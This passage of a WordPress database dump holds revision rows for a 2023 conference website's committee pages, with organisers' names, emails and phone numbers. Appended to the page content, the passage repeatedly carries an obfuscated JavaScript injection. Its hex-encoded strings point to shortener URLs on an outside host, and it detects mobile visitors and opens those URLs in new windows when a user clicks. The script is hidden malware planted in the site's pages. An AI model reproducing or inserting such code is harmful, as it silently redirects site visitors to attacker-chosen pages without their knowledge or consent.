_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','dt-the7','','inherit','closed','closed','','4823-revision-v1','','','2023-06-27 09:45:14','2023-06-27 09:45:14','',4823,'https://gsw2023.com/?p=4886',0,'revision','',0),
(4887,4,'2023-06-27 09:45:38','2023-06-27 09:45:38','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nashwa.elbendary@aast.ed</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 09:45:38','2023-06-27 09:45:38','',4849,'https://gsw2023.com/?p=4887',0,'revision','',0),
(4888,4,'2023-06-27 09:51:00','2023-06-27 09:51:00','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/aast2.png\" alt=\"\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 